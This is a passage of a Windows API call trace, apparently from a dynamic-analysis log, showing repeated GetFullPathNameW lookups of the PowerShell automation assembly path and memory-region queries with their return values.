	[0226.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.644] GetLastError () returned 0x0
	[0226.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.645] GetLastError () returned 0x0
	[0226.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.645] GetLastError () returned 0x0
	[0226.645] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.645] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.646] GetLastError () returned 0x0
	[0226.646] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.647] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.647] GetLastError () returned 0x0
	[0226.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.647] GetLastError () returned 0x0
	[0226.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.647] GetLastError () returned 0x0
	[0226.647] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.648] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.648] GetLastError () returned 0x0
	[0226.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.648] GetLastError () returned 0x0
	[0226.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.648] GetLastError () returned 0x0
	[0226.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.648] GetLastError () returned 0x0
	[0226.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.648] GetLastError () returned 0x0
	[0226.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.649] GetLastError () returned 0x0
	[0226.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.649] GetLastError () returned 0x0
	[0226.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.649] GetLastError () returned 0x0
	[0226.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.649] GetLastError () returned 0x0
	[0226.649] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.654] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.654] GetLastError () returned 0x0
	[0226.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.654] GetLastError () returned 0x0
	[0226.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.654] GetLastError () returned 0x0
	[0226.655] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.655] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.655] GetLastError () returned 0x0
	[0226.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.655] GetLastError () returned 0x0
	[0226.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.655] GetLastError () returned 0x0
	[0226.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.656] GetLastError () returned 0x0
	[0226.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.656] GetLastError () returned 0x0
	[0226.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.656] GetLastError () returned 0x0
	[0226.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.656] GetLastError () returned 0x0
	[0226.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.656] GetLastError () returned 0x0
	[0226.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.657] GetLastError () returned 0x0
	[0226.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.657] GetLastError () returned 0x0
	[0226.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.657] GetLastError () returned 0x0
	[0226.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.657] GetLastError () returned 0x0
	[0226.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.657] GetLastError () returned 0x0
	[0226.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.658] GetLastError () returned 0x0
	[0226.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.658] GetLastError () returned 0x0
	[0226.658] VirtualQuery (in: lpAddress=0x29d134, lpBuffer=0x29e134, dwLength=0x1c | out: lpBuffer=0x29e134*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.659] GetLastError () returned 0x0
	[0226.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.659] GetLastError () returned 0x0
	[0226.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.659] GetLastError () returned 0x0
	[0226.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.659] GetLastError () returned 0x0
	[0226.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.660] GetLastError () returned 0x0
	[0226.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.661] GetLastError () returned 0x0
	[0226.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.661] GetLastError () returned 0x0
	[0226.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.661] GetLastError () returned 0x0
	[0226.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.661] GetLastError () returned 0x0
	[0226.661] VirtualQuery (in: lpAddress=0x29d134, lpBuffer=0x29e134, dwLength=0x1c | out: lpBuffer=0x29e134*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
